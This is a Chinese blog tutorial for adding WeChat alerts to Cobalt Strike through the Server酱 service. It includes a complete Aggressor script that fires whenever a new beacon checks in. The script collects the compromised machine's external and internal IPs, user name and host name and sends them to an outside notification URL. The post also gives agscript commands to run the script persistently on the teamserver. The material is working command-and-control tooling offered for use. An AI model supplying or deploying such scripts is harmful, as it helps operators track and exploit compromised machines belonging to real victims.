CobaltStrike-机器上线微信提醒
这两天看cs看的头大
原文地址:http://www.nmd5.com/?p=567
Server酱申请账号
我们先申请一个Server酱的账号,使用Github账号即可登录,地址:
申请SCKEY
登录之后,如下:
点击发送消息,申请SCKEY。
编写cna
# 循环获取所有beacon
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "
";
}
println($output);
}
#获取ip、计算机名、登录账号
$externalIP = replace(beacon_info($1, "external"), " ", "_");
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
#get一下Server酱的链接
$url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
http_get($url);
}将你的SCKEY在上述代码表明的位置进行替换,保存为cna脚本。
利用agscript加载脚本
如果选择在本地客户端加载脚本,那么只有当我们打开CobaltStrike时,机器上线我们才会收到消息提醒。
所以,我们需要在服务器上使用agscript加载脚本,这样才能做到机器上线,微信及时提醒的效果。
命令语法:
./agscript [host] [port] [user] [pass] </path/to/file.cna>- [host] #服务器的ip地址。
- [port] #cs的端口号,启动cs时有显示。
- [user] #用户名,用来运行这个脚本的用户名,随便即可。
- [pass] #cs的密码,就是启动cs时你设置的密码。
- [path] #cna文件的路径。
绑定微信
完成这一步就ok了。
进行测试
先开启teamserver,再启动脚本:
测试成功。
舒服。